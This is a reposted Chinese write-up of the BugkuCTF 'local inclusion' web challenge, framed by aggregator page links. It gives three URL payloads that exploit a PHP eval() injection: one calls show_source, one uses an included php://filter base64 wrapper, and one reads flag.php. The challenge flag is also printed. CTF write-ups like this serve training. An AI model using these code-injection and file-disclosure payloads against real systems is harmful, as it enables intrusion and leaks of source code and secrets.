【BugkuCTF】Web--本地包含 - 代码天地

【BugkuCTF】Web--本地包含

其他 2019-03-07 08:51:02 阅读次数: 0

Description:

地址：http://123.206.87.240:8003/

这个地址已经不行了，故本文为转载，源于：https://blog.csdn.net/dyw_666666/article/details/82389457#comments该文章

Solution:

题目内容为：

方法一：

eval存在命令执行漏洞，使用hello构造payload
http://120.24.86.145:8003/index.php?hello=1);show_source(%27flag.php%27);var_dump(3
方法二：
http://120.24.86.145:8003/index.php?hello=1);include $_POST['f'];//
在POST区域：f=php://filter/convert.base64-encode/resource=flag.php
Base64解码即可。

方法三：

直接将flag.php文件读入变量hello中
?hello=get_file_contents('flag.php')
?hello=file('flag.php')

Flag:

flag{bug-ctf-gg-99}

猜你喜欢

转载自blog.csdn.net/qq_34072526/article/details/87734649

【BugkuCTF】Web--本地包含

BugKuCTF WEB 本地包含

BugkuCTF-WEB-本地包含

BugKuCTF：web 本地包含；变量1

BugkuCTF--本地包含

BugkuCTF WEB

WEB--小样例模板:

BugkuCTF文件包含漏洞

Bugku—web—本地包含（wp）

1.java web--动态web

web--前端之js代码5

web--前端之css代码1

web--前端之js代码8

web--前端之js代码7

web--前端之js代码6

web--易--后台登陆

web--响应式导航菜单

web--判断是否为闰年

web--斐波那契数列

java web--页面分页技术

BugkuCTF web2

BugkuCTF web基础$_GET

BugkuCTF web基础$_POST

BugkuCTF web5

BugkuCTF web3

BugkuCTF笔记——web

BugkuCTF~Web~WriteUp

Bugkuctf web writeup

BugKuCTF WEB 网站被黑

BugKuCTF WEB 变量1

今日推荐

面壁智能发布 Eurux-8x22B 开源大模型 —— 堪称「理科状元」

开源日报 | 谷歌扶持鸿蒙上位；开源Rabbit R1；Docker加持的安卓手机；微软的焦虑和野心；海尔电器把开放平台关了

中国码农的“35岁魔咒”

蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版，免费下载

Arc Browser for Windows 1.0 正式 GA

90后程序员开发视频搬运软件、不到一年获利超 700 万，结局很刑！

周排行

【转】spring中对控制反转和依赖注入的理解

tms webcore 安装和使用

java程序员进阶相关书籍

SpringMVC接受请求参数、

如何保存训练好的机器学习模型

MyEclipse、Eclipse设置项目JDK的三个地方

商超行业微信小程序开发定制一般多少钱（行业技术人员解读）

Markdown编辑器语言——30分钟入门到到精通

Linux系统下MongoDB的简单安装与基本操作

Power Strings

每日归档

更多

2024-05-07(14)

2024-05-06(40)

2024-05-05(0)

2024-05-04(7)

2024-05-03(19)

2024-05-02(0)

2024-05-01(4)

2024-04-30(1)

2024-04-29(40)

2024-04-28(0)